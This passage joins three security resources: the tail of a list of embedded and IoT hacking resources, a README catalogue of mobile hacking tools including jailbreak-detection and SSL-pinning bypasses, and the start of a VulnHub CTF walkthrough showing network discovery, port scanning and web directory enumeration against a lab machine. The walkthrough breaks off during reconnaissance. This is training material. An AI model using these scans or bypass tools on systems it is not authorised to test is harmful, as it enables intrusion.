Security@CERN](https://doi.org/10.5281/zenodo.1035034) - [Multiple vulnerabilities found in the D-link DWR-932B](https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html) - [Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol](https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html) - [PWN Xerox Printers (...again)](https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf) - [Reversing Firmware With Radare](https://www.bored-nerds.com/reversing/radare/automotive/2019/07/07/reversing-firmware-with-radare.html) - [Reversing the Huawei HG533](http://jcjc-dev.com/2016/04/08/reversing-huawei-router-1-find-uart/) ## Free Training - [CSAW Embedded Security Challenge 2019](https://github.com/TrustworthyComputing/csaw_esc_2019) - CSAW 2019 Embedded Security Challenge (ESC). - [Embedded Security CTF](https://microcorruption.com) - Microcorruption: Embedded Security CTF. - [Hardware Hacking 101](https://github.com/rdomanski/hardware_hacking/tree/master/my_talks/Hardware_Hacking_101) - Workshop @ BSides Munich 2019. - [IoTGoat](https://github.com/scriptingxss/IoTGoat) - IoTGoat is a deliberately insecure firmware based on OpenWrt. - [Rhme-2015](https://github.com/Riscure/RHme-2015) - First riscure Hack me hardware CTF challenge. - [Rhme-2016](https://github.com/Riscure/Rhme-2016) - Riscure Hack me 2 is a low level hardware CTF challenge. - [Rhme-2017/2018](https://github.com/Riscure/Rhme-2017) - Riscure Hack Me 3 embedded hardware CTF 2017-2018. ## Websites - [Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page) - All things printer. - [OWASP Embedded Application Security Project](https://owasp.org/www-project-embedded-application-security/) - Development best practices and list of hardware and software tools. - [OWASP Internet of Things Project](https://owasp.org/www-project-internet-of-things/) - IoT common vulnerabilities and attack surfaces. - [Router Passwords](https://192-168-1-1ip.mobi/default-router-passwords-list/) - Default login credential database sorted by manufacturer. - [Siliconpr0n](https://siliconpr0n.org/) - A Wiki/Archive of all things IC reversing. ### Blogs <!--lint ignore no-repeat-punctuation--> - [RTL-SDR](https://www.rtl-sdr.com/) - [/dev/ttyS0's Embedded Device Hacking](http://www.devttys0.com/blog/) - [Exploiteers](https://www.exploitee.rs/) - [Hackaday](https://hackaday.com) - [jcjc's Hack The World](https://jcjc-dev.com/) - [Quarkslab](https://blog.quarkslab.com/) - [wrong baud](https://wrongbaud.github.io/) - [Firmware Security](https://firmwaresecurity.com/) - [PenTestPartners](https://www.pentestpartners.com/internet-of-things/) - [Attify](https://blog.attify.com/) - [Patayu](https://payatu.com/blog) - [GracefulSecurity - Hardware tag](https://gracefulsecurity.com/category/hardware/) - [Black Hills - Hardware Hacking tag](https://www.blackhillsinfosec.com/tag/hardware-hacking/) ### Tutorials and Technical Background - [Azeria Lab](https://azeria-labs.com/) - Miscellaneous ARM related Tutorials. - [JTAG Explained](https://blog.senr.io/blog/jtag-explained#) - A walkthrough covering UART and JTAG bypassing a protected login shell. - [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/) - Detailed tutorial about how to spot debug pads on a PCB. - [UART explained](https://www.mikroe.com/blog/uart-serial-communication) - An in depth explanation of the UART protocol. ### YouTube Channels - [Flashback Team](https://www.youtube.com/c/FlashbackTeam) - A duo of hackers explaining their step by step approach to finding and exploiting vulnerabilities in embedded devices. - [StackSmashing](https://www.youtube.com/c/stacksmashing) - Reverse engineering and hardware hacking of embedded devices. ## Conferences Conferences focused on embedded and/or IoT security. - [Hardwear.io](https://hardwear.io/) - EU, The Hague, September. - USA, Santa Clara, June. ## Contribute Contributions welcome! Read the [contribution guidelines](contributing.md) first. ## License [![CC0](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](https://creativecommons.org/publicdomain/zero/1.0/) To the extent possible under law, Fraunhofer FKIE has waived all copyright and related or neighboring rights to this work.
<h1 align="center"> <br> <a href=""><img src="https://user-images.githubusercontent.com/13212227/104400983-a5cc0a00-5596-11eb-8aeb-81c747f26663.png" width="500px"></a> <br> <img src="https://img.shields.io/github/languages/top/hahwul/MobileHackersWeapons?style=flat"> <img src="https://img.shields.io/github/last-commit/hahwul/MobileHackersWeapons?style=flat"> <img src="https://img.shields.io/badge/PRs-welcome-cyan"> <img src="https://github.com/hahwul/MobileHackersWeapons/workflows/Build/badge.svg"> <img src="https://github.com/hahwul/MobileHackersWeapons/workflows/CodeQL/badge.svg"> <a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/twitter/follow/hahwul?style=flat&logo=twitter"></a> </h1> A collection of cool tools used by Mobile hackers. Happy hacking , Happy bug-hunting ## Family project [![WebHackersWeapons](https://img.shields.io/github/stars/hahwul/WebHackersWeapons?label=WebHackersWeapons)](https://github.com/hahwul/WebHackersWeapons) [![MobileHackersWeapons](https://img.shields.io/github/stars/hahwul/MobileHackersWeapons?label=MobileHackersWeapons)](https://github.com/hahwul/MobileHackersWeapons) ## Table of Contents - [Weapons](#weapons) - [Contribute](/CONTRIBUTING.md) - [Thanks to contributor](#thanks-to-contributor) ## Weapons | OS | Type | Name | Description | Popularity | Language | | ---------- | :---------- | :---------- | :----------: | :----------: | :----------: | | All | Analysis | [RMS-Runtime-Mobile-Security](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) | Runtime Mobile Security (RMS) ๐Ÿ“ฑ๐Ÿ”ฅ - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime | ![](https://img.shields.io/github/stars/m0bilesecurity/RMS-Runtime-Mobile-Security) | ![](https://img.shields.io/github/languages/top/m0bilesecurity/RMS-Runtime-Mobile-Security) | | All | Analysis | [flipper](https://github.com/facebook/flipper) | A desktop debugging platform for mobile developers. | ![](https://img.shields.io/github/stars/facebook/flipper) | ![](https://img.shields.io/github/languages/top/facebook/flipper) | | All | Analysis | [scrounger](https://github.com/nettitude/scrounger) | Mobile application testing toolkit | ![](https://img.shields.io/github/stars/nettitude/scrounger) | ![](https://img.shields.io/github/languages/top/nettitude/scrounger) | | All | Pentest | [metasploit-framework](https://github.com/rapid7/metasploit-framework) | Metasploit Framework | ![](https://img.shields.io/github/stars/rapid7/metasploit-framework) | ![](https://img.shields.io/github/languages/top/rapid7/metasploit-framework) | | All | Proxy | [BurpSuite](https://portswigger.net/burp) | The BurpSuite|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | All | Proxy | [hetty](https://github.com/dstotijn/hetty) | Hetty is an HTTP toolkit for security research. | ![](https://img.shields.io/github/stars/dstotijn/hetty) | ![](https://img.shields.io/github/languages/top/dstotijn/hetty) | | All | Proxy | [httptoolkit](https://github.com/httptoolkit/httptoolkit) | HTTP Toolkit is a beautiful & open-source tool for debugging, testing and building with HTTP(S) on Windows, Linux & Mac | ![](https://img.shields.io/github/stars/httptoolkit/httptoolkit) | ![](https://img.shields.io/github/languages/top/httptoolkit/httptoolkit) | | All | Proxy | [proxify](https://github.com/projectdiscovery/proxify) | Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go. | ![](https://img.shields.io/github/stars/projectdiscovery/proxify) | ![](https://img.shields.io/github/languages/top/projectdiscovery/proxify) | | All | Proxy | [zaproxy](https://github.com/zaproxy/zaproxy) | The OWASP ZAP core project | ![](https://img.shields.io/github/stars/zaproxy/zaproxy) | ![](https://img.shields.io/github/languages/top/zaproxy/zaproxy) | | All | RE | [diff-gui](https://github.com/antojoseph/diff-gui) | GUI for Frida -Scripts | ![](https://img.shields.io/github/stars/antojoseph/diff-gui) | ![](https://img.shields.io/github/languages/top/antojoseph/diff-gui) | | All | RE | [frida](https://github.com/frida/frida) | Clone this repo to build Frida | ![](https://img.shields.io/github/stars/frida/frida) | ![](https://img.shields.io/github/languages/top/frida/frida) | | All | RE | [frida-tools](https://github.com/frida/frida-tools) | Frida CLI tools | ![](https://img.shields.io/github/stars/frida/frida-tools) | ![](https://img.shields.io/github/languages/top/frida/frida-tools) | | All | RE | [fridump](https://github.com/Nightbringer21/fridump) | A universal memory dumper using Frida | ![](https://img.shields.io/github/stars/Nightbringer21/fridump) | ![](https://img.shields.io/github/languages/top/Nightbringer21/fridump) | | All | RE | [ghidra](https://github.com/NationalSecurityAgency/ghidra) | Ghidra is a software reverse engineering (SRE) framework | ![](https://img.shields.io/github/stars/NationalSecurityAgency/ghidra) | ![](https://img.shields.io/github/languages/top/NationalSecurityAgency/ghidra) | | All | SCRIPTS | [frida-gadget](https://github.com/ksg97031/frida-gadget) | frida-gadget is a tool that can be used to patch APKs in order to utilize the Frida gadget. | ![](https://img.shields.io/github/stars/ksg97031/frida-gadget) | ![](https://img.shields.io/github/languages/top/ksg97031/frida-gadget) | | All | SCRIPTS | [frida-scripts](https://github.com/0xdea/frida-scripts) | A collection of my Frida.re instrumentation scripts to facilitate reverse engineering of mobile apps. | ![](https://img.shields.io/github/stars/0xdea/frida-scripts) | ![](https://img.shields.io/github/languages/top/0xdea/frida-scripts) | | All | Scanner | [Mobile-Security-Framework-MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) | Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. | ![](https://img.shields.io/github/stars/MobSF/Mobile-Security-Framework-MobSF) | ![](https://img.shields.io/github/languages/top/MobSF/Mobile-Security-Framework-MobSF) | | All | Scanner | [StaCoAn](https://github.com/vincentcox/StaCoAn) | StaCoAn is a crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications. | ![](https://img.shields.io/github/stars/vincentcox/StaCoAn) | ![](https://img.shields.io/github/languages/top/vincentcox/StaCoAn) | | All | Utils | [watchman](https://github.com/facebook/watchman) | Watches files and records, or triggers actions, when they change. | ![](https://img.shields.io/github/stars/facebook/watchman) | ![](https://img.shields.io/github/languages/top/facebook/watchman) | | Android | Analysis | [apkleaks](https://github.com/dwisiswant0/apkleaks) | Scanning APK file for URIs, endpoints & secrets. | ![](https://img.shields.io/github/stars/dwisiswant0/apkleaks) | ![](https://img.shields.io/github/languages/top/dwisiswant0/apkleaks) | | Android | Analysis | [drozer](https://github.com/FSecureLABS/drozer) | The Leading Security Assessment Framework for Android. | ![](https://img.shields.io/github/stars/FSecureLABS/drozer) | ![](https://img.shields.io/github/languages/top/FSecureLABS/drozer) | | Android | Device | [scrcpy](https://github.com/Genymobile/scrcpy) | Display and control your Android device | ![](https://img.shields.io/github/stars/Genymobile/scrcpy) | ![](https://img.shields.io/github/languages/top/Genymobile/scrcpy) | | Android | Discovery | [PortAuthority](https://github.com/aaronjwood/PortAuthority) | A handy systems and security-focused tool, Port Authority is a very fast Android port scanner. Port Authority also allows you to quickly discover hosts on your network and will display useful network information about your device and other hosts. | ![](https://img.shields.io/github/stars/aaronjwood/PortAuthority) | ![](https://img.shields.io/github/languages/top/aaronjwood/PortAuthority) | | Android | Monitor | [Hijacker](https://github.com/chrisk44/Hijacker) | Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android | ![](https://img.shields.io/github/stars/chrisk44/Hijacker) | ![](https://img.shields.io/github/languages/top/chrisk44/Hijacker) | | Android | Monitor | [PCAPdroid](https://github.com/emanuele-f/PCAPdroid) | No-root network monitor, firewall and PCAP dumper for Android | ![](https://img.shields.io/github/stars/emanuele-f/PCAPdroid) | ![](https://img.shields.io/github/languages/top/emanuele-f/PCAPdroid) | | Android | NFC | [nfcgate](https://github.com/nfcgate/nfcgate) | An NFC research toolkit application for Android | ![](https://img.shields.io/github/stars/nfcgate/nfcgate) | ![](https://img.shields.io/github/languages/top/nfcgate/nfcgate) | | Android | Pentest | [Kali NetHunter](https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-project) | Mobile Penetration Testing Platform|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | Android | RE | [Apktool](https://github.com/iBotPeaches/Apktool) | A tool for reverse engineering Android apk files | ![](https://img.shields.io/github/stars/iBotPeaches/Apktool) | ![](https://img.shields.io/github/languages/top/iBotPeaches/Apktool) | | Android | RE | [JEB](https://www.pnfsoftware.com/jeb/) | reverse-engineering platform to perform disassembly, decompilation, debugging, and analysis of code and document files, manually or as part of an analysis pipeline.|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | Android | RE | [Smali-CFGs](https://github.com/EugenioDelfa/Smali-CFGs) | Smali Control Flow Graph's | ![](https://img.shields.io/github/stars/EugenioDelfa/Smali-CFGs) | ![](https://img.shields.io/github/languages/top/EugenioDelfa/Smali-CFGs) | | Android | RE | [androguard](https://github.com/androguard/androguard) | Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) | ![](https://img.shields.io/github/stars/androguard/androguard) | ![](https://img.shields.io/github/languages/top/androguard/androguard) | | Android | RE | [apkx](https://github.com/b-mueller/apkx) | One-Step APK Decompilation With Multiple Backends | ![](https://img.shields.io/github/stars/b-mueller/apkx) | ![](https://img.shields.io/github/languages/top/b-mueller/apkx) | | Android | RE | [btrace](https://github.com/bytedance/btrace) | ๐Ÿ”ฅ๐Ÿ”ฅ btrace(AKA RheaTrace) is a high performance Android trace tool which is based on Systrace, it support to define custom events automatically during building apk and using bhook to provider more native events like IO. | ![](https://img.shields.io/github/stars/bytedance/btrace) | ![](https://img.shields.io/github/languages/top/bytedance/btrace) | | Android | RE | [bytecode-viewer](https://github.com/Konloch/bytecode-viewer/) | A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More) | ![](https://img.shields.io/github/stars/Konloch/bytecode-viewer/) | ![](https://img.shields.io/github/languages/top/Konloch/bytecode-viewer/) | | Android | RE | [dex-oracle](https://github.com/CalebFenton/dex-oracle) | A pattern based Dalvik deobfuscator which uses limited execution to improve semantic analysis | ![](https://img.shields.io/github/stars/CalebFenton/dex-oracle) | ![](https://img.shields.io/github/languages/top/CalebFenton/dex-oracle) | | Android | RE | [dex2jar](https://github.com/pxb1988/dex2jar) | Tools to work with android .dex and java .class files | ![](https://img.shields.io/github/stars/pxb1988/dex2jar) | ![](https://img.shields.io/github/languages/top/pxb1988/dex2jar) | | Android | RE | [enjarify](https://github.com/Storyyeller/enjarify) | Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications. | ![](https://img.shields.io/github/stars/Storyyeller/enjarify) | ![](https://img.shields.io/github/languages/top/Storyyeller/enjarify) | | Android | RE | [jadx](https://github.com/skylot/jadx) | Dex to Java decompiler | ![](https://img.shields.io/github/stars/skylot/jadx) | ![](https://img.shields.io/github/languages/top/skylot/jadx) | | Android | RE | [jd-gui](https://github.com/java-decompiler/jd-gui) | A standalone Java Decompiler GUI | ![](https://img.shields.io/github/stars/java-decompiler/jd-gui) | ![](https://img.shields.io/github/languages/top/java-decompiler/jd-gui) | | Android | RE | [procyon](https://github.com/mstrobel/procyon) | Procyon is a suite of Java metaprogramming tools, including a rich reflection API, a LINQ-inspired expression tree API for runtime code generation, and a Java decompiler. | ![](https://img.shields.io/github/stars/mstrobel/procyon) | ![](https://img.shields.io/github/languages/top/mstrobel/procyon) | | Android | Scanner | [qark](https://github.com/linkedin/qark) | Tool to look for several security related Android application vulnerabilities | ![](https://img.shields.io/github/stars/linkedin/qark) | ![](https://img.shields.io/github/languages/top/linkedin/qark) | | Android | Target | [PlaystoreDownloader](https://github.com/ClaudiuGeorgiu/PlaystoreDownloader) | A command line tool to download Android applications directly from the Google Play Store by specifying their package name (an initial one-time configuration is required) | ![](https://img.shields.io/github/stars/ClaudiuGeorgiu/PlaystoreDownloader) | ![](https://img.shields.io/github/languages/top/ClaudiuGeorgiu/PlaystoreDownloader) | | Android | Target | [googleplay](https://github.com/89z/googleplay) | Download APK from Google Play or send API requests | ![](https://img.shields.io/github/stars/89z/googleplay) | ![](https://img.shields.io/github/languages/top/89z/googleplay) | | Android | Target | [gplaycli](https://github.com/matlink/gplaycli) | Google Play Downloader via Command line | ![](https://img.shields.io/github/stars/matlink/gplaycli) | ![](https://img.shields.io/github/languages/top/matlink/gplaycli) | | Android | Target | [gplaydl](https://github.com/rehmatworks/gplaydl) | Command Line Google Play APK downloader. Download APK files to your PC directly from Google Play Store. | ![](https://img.shields.io/github/stars/rehmatworks/gplaydl) | ![](https://img.shields.io/github/languages/top/rehmatworks/gplaydl) | | Android | Utils | [Magisk](https://github.com/topjohnwu/Magisk) | The Magic Mask for Android | ![](https://img.shields.io/github/stars/topjohnwu/Magisk) | ![](https://img.shields.io/github/languages/top/topjohnwu/Magisk) | | Android | Utils | [behe-keyboard](https://github.com/VladThodo/behe-keyboard) | A lightweight hacking & programming keyboard with material design | ![](https://img.shields.io/github/stars/VladThodo/behe-keyboard) | ![](https://img.shields.io/github/languages/top/VladThodo/behe-keyboard) | | Android | Utils | [termux-app](https://github.com/termux/termux-app) | Termux - a terminal emulator application for Android OS extendible by variety of packages. | ![](https://img.shields.io/github/stars/termux/termux-app) | ![](https://img.shields.io/github/languages/top/termux/termux-app) | | iOS | Analysis | [iFunBox](http://www.i-funbox.com/) | General file management software for iPhone and other Apple products|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | iOS | Analysis | [iblessing](https://github.com/Soulghost/iblessing) | iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining. | ![](https://img.shields.io/github/stars/Soulghost/iblessing) | ![](https://img.shields.io/github/languages/top/Soulghost/iblessing) | | iOS | Analysis | [needle](https://github.com/FSecureLABS/needle) | The iOS Security Testing Framework | ![](https://img.shields.io/github/stars/FSecureLABS/needle) | ![](https://img.shields.io/github/languages/top/FSecureLABS/needle) | | iOS | Analysis | [objection](https://github.com/sensepost/objection) | ๐Ÿ“ฑ objection - runtime mobile exploration | ![](https://img.shields.io/github/stars/sensepost/objection) | ![](https://img.shields.io/github/languages/top/sensepost/objection) | | iOS | Bluetooth | [toothpicker](https://github.com/seemoo-lab/toothpicker) | ToothPicker is an in-process, coverage-guided fuzzer for iOS. for iOS Bluetooth | ![](https://img.shields.io/github/stars/seemoo-lab/toothpicker) | ![](https://img.shields.io/github/languages/top/seemoo-lab/toothpicker) | | iOS | Bypass Jailbreak | [A-Bypass](https://www.ios-repo-updates.com/repository/baw-repo/package/com.rpgfarm.a-bypass/) | Super Jailbreak detection bypass!|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | iOS | Bypass Jailbreak | [FlyJB-X](https://github.com/XsF1re/FlyJB-X) | You can HIDE Doing jailbreak your iDevice. | ![](https://img.shields.io/github/stars/XsF1re/FlyJB-X) | ![](https://img.shields.io/github/languages/top/XsF1re/FlyJB-X) | | iOS | Bypass Jailbreak | [HideJB](http://cydia.saurik.com/package/com.thuthuatjb.hidejb/) | a tweak has the ability to skip jailbreak detection on iOS apps.|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | iOS | Bypass Jailbreak | [Liberty](https://yalujailbreak.net/liberty/) | Bypass Jailbreak and SSL Pinning|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray)|![](https://img.shields.io/static/v1?label=&message=it's%20not%20github&color=gray) | iOS | Inject | [bfinject](https://github.com/BishopFox/bfinject) | Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks | ![](https://img.shields.io/github/stars/BishopFox/bfinject) | ![](https://img.shields.io/github/languages/top/BishopFox/bfinject) | | iOS | RE | [Clutch](https://github.com/KJCracks/Clutch) | Fast iOS executable dumper | ![](https://img.shields.io/github/stars/KJCracks/Clutch) | ![](https://img.shields.io/github/languages/top/KJCracks/Clutch) | | iOS | RE | [class-dump](https://github.com/nygard/class-dump) | Generate Objective-C headers from Mach-O files. | ![](https://img.shields.io/github/stars/nygard/class-dump) | ![](https://img.shields.io/github/languages/top/nygard/class-dump) | | iOS | RE | [frida-ios-dump](https://github.com/AloneMonkey/frida-ios-dump) | pull decrypted ipa from jailbreak device | ![](https://img.shields.io/github/stars/AloneMonkey/frida-ios-dump) | ![](https://img.shields.io/github/languages/top/AloneMonkey/frida-ios-dump) | | iOS | RE | [iRET](https://github.com/S3Jensen/iRET) | iOS Reverse Engineering Toolkit. | ![](https://img.shields.io/github/stars/S3Jensen/iRET) | ![](https://img.shields.io/github/languages/top/S3Jensen/iRET) | | iOS | RE | [iSpy](https://github.com/BishopFox/iSpy) | A reverse engineering framework for iOS | ![](https://img.shields.io/github/stars/BishopFox/iSpy) | ![](https://img.shields.io/github/languages/top/BishopFox/iSpy) | | iOS | RE | [momdec](https://github.com/atomicbird/momdec) | Core Data Managed Object Model Decompiler | ![](https://img.shields.io/github/stars/atomicbird/momdec) | ![](https://img.shields.io/github/languages/top/atomicbird/momdec) | | iOS | Target | [ipainstaller](https://github.com/autopear/ipainstaller) | Install IPA from command line | ![](https://img.shields.io/github/stars/autopear/ipainstaller) | ![](https://img.shields.io/github/languages/top/autopear/ipainstaller) | | iOS | Unpinning | [MEDUZA](https://github.com/kov4l3nko/MEDUZA) | A more or less universal SSL unpinning tool for iOS | ![](https://img.shields.io/github/stars/kov4l3nko/MEDUZA) | ![](https://img.shields.io/github/languages/top/kov4l3nko/MEDUZA) | | iOS | Unpinning | [ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2) | Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps | ![](https://img.shields.io/github/stars/nabla-c0d3/ssl-kill-switch2) | ![](https://img.shields.io/github/languages/top/nabla-c0d3/ssl-kill-switch2) | | iOS | Utils | [idb](https://github.com/facebook/idb) | idb is a flexible command line interface for automating iOS simulators and devices | ![](https://img.shields.io/github/stars/facebook/idb) | ![](https://img.shields.io/github/languages/top/facebook/idb) | ## Thanks to (Contributor) I would like to thank everyone who helped with this project ๐Ÿ‘๐Ÿ˜Ž ![](/CONTRIBUTORS.svg)
# Odin #1 - CTF Available on VulnHub: https://www.vulnhub.com/entry/odin-1,619/ ## IP Discovery ``` $ sudo netdiscover -r 192.168.1.0/16 ``` ``` Currently scanning: Finished! | Screen View: Unique Hosts 0 Captured ARP Req/Rep packets, from 0 hosts. Total size: 0 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- xxx.xxx.x.x xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxx.xxx.x.xxx xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxx.xxx.x.xxx xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 192.168.1.181 08:00:27:98:83:4d 1 60 PCS Systemtechnik GmbH xxx.xxx.x.xxx xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxx.xxx.x.xxx xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxx.xxx.x.xxx xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxx.xxx.x.xxx xx:xx:xx:xx:xx:xx x xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ``` ## Port Scanning ``` $ nmap -AT4 -p- 192.168.1.181 ``` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 17:55 -03 Nmap scan report for 192.168.1.181 Host is up (0.00026s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.5.3 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: vikingarmy &#8211; Just another Joomla site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.63 seconds ``` ## HTML Source Analysis The page source has references for `http://odin/`. So I created a entry for my DNS hosts mapping target IP address. ``` $ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 Kali-Burton 192.168.1.181 odin ``` The page has some encoded content. Lets decode it: ``` $ echo "NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTUMFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===" | base32 -d https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist ``` ``` $ echo "SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=" | base64 -d If you look closely, you won't need it here ``` ## Web Analysis ``` $ dirb http://192.168.1.181 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Dec 19 18:23:12 2020 URL_BASE: http://192.168.1.181/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.181/ ---- + http://192.168.1.181/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.1.181/javascript/ + http://192.168.1.181/phpmyadmin (CODE:403|SIZE:278) + http://192.168.1.181/server-status (CODE:403|SIZE:278) ==> DIRECTORY: http://192.168.1.181/wp-admin/ ==> DIRECTORY: http://192.168.1.181/wp-content/ ==> DIRECTORY: http://192.168.1.181/wp-includes/ + http://192.168.1.181/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.1.181/javascript/ ---- ==> DIRECTORY: http://192.168.1.181/javascript/jquery/ ---- Entering directory: http://192.168.1.181/wp-admin/ ---- + http://192.168.1.181/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.1.181/wp-admin/css/ ==> DIRECTORY: http://192.168.1.181/wp-admin/images/ ==> DIRECTORY: http://192.168.1.181/wp-admin/includes/ + http://192.168.1.181/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.1.181/wp-admin/js/ ==> DIRECTORY: http://192.168.1.181/wp-admin/maint/ ==> DIRECTORY: http://192.168.1.181/wp-admin/network/ ==> DIRECTORY: http://192.168.1.181/wp-admin/user/ ---- Entering directory: http://192.168.1.181/wp-content/ ---- + http://192.168.1.181/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.1.181/wp-content/languages/ ==> DIRECTORY: http://192.168.1.181/wp-content/plugins/ ==> DIRECTORY: http://192.168.1.181/wp-content/themes/ ==> DIRECTORY: http://192.168.1.181/wp-content/upgrade/ ==> DIRECTORY: http://192.168.1.181/wp-content/uploads/ ---- Entering directory: http://192.168.1.181/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/javascript/jquery/ ---- + http://192.168.1.181/javascript/jquery/jquery (CODE:200|SIZE:271809) ---- Entering directory: http://192.168.1.181/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-admin/network/ ---- + http://192.168.1.181/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://192.168.1.181/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.1.181/wp-admin/user/ ---- + http://192.168.1.181/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://192.168.1.181/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.1.181/wp-content/languages/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-content/plugins/ ---- + http://192.168.1.181/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.1.181/wp-content/themes/ ---- + http://192.168.1.181/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.1.181/wp-content/upgrade/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.181/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sat Dec 19 18:23:27 2020 DOWNLOADED: 41508 - FOUND: 14 ``` ``` $ nikto -h http://192.168.1.181 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.181 + Target Hostname: 